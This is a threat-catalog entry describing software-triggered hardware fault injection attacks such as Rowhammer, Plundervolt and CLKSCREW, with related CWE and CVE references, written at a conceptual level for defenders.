TID-110: Hardware Fault Injection – Data Manipulation

Threat Description

Certain software-executed attacks can introduce a fault to the physical hardware of the device, leading to greater access or exploit opportunities. Typically, these kinds of attacks involve performing a software action that would necessitate a predictable and controllable reaction in hardware. If this hardware action contains properties that allow for some kind of fault to occur, then the threat actor can inject the fault through software and try to leverage it into an exploit.

For example, the Rowhammer exploit demonstrates how repeated dynamic random access memory (DRAM) accesses can lead to a privilege escalation exploit. This exploit is possible through the combination of DRAM cells being placed very close together and attackers repeatedly accessing the same physical cells on the DRAM from software. This repeated access causes a leakage of electric charge within the memory, leading to a manipulation of the charge of nearby memory locations. This induced charge manipulation results in a manipulation of the contents of memory itself. By manipulating the contents of memory, the threat actor may be able to escalate privileges on a device or otherwise bypass security controls.

Another example of this is the Plundervolt exploit. In this attack, researchers demonstrated that users could use software to control the supply voltage of a secure enclave during computation, up to the point of introducing a fault in the processor itself. They were able to leverage this fault into a set of exploits where they could corrupt cryptographic signatures through voltage variability, extract cryptographic keys using differential fault analysis, or introduce memory safety vulnerabilities in otherwise bug-free code.

Threat Maturity and Evidence

Proof of Concept

• RowHammer
  In 2014 and thereafter, researchers demonstrated the ability to corrupt data in nearby DDR3 and DDR4 DRAM rows by repeatedly accessing data from the same row. It is possible to turn this phenomenon into exploits through various means.

• Plundervolt In 2020, researchers demonstrated the ability to introduce and exploit faults in Intel’s SGX secure enclave through voltage manipulation. By carefully introducing these faults and measuring the output, researchers showed that they could corrupt integrity checks using cryptographic signatures, extract cryptographic encryption keys through differential fault analysis, and introduce exploitable memory safety issues in bug-free code. The exploit requires a high degree of software access to perform; however, it does not require any physical access to the machine.

• CLKSCREW
  In 2017, researchers demonstrated that it was possible to manipulate the voltage and frequency of processor cores using native tools, such as Dynamic Voltage and Frequency Scaling management interfaces, to introduce hardware faults. They then could leverage these faults corrupt bits that would allow them to exploit the machine. For example, the researchers demonstrated that by flipping bits at the right time they could corrupt some data during the decryption of a signature so that malicious code would pass a future signed hash check.

CWE

• CWE-1256: Improper Restriction of Software Interfaces to Hardware Interfaces
  “The product provides software-controllable device functionality for capabilities such as power and clock management, but it does not properly limit functionality that can lead to modification of hardware memory or register bits, or the ability to observe physical side channels.”

CVE

• CVE-2021-42144
  “Modern DRAM devices (PC-DDR4, LPDDR4X) are affected by a vulnerability in their internal Target Row Refresh (TRR) mitigation against Rowhammer attacks.”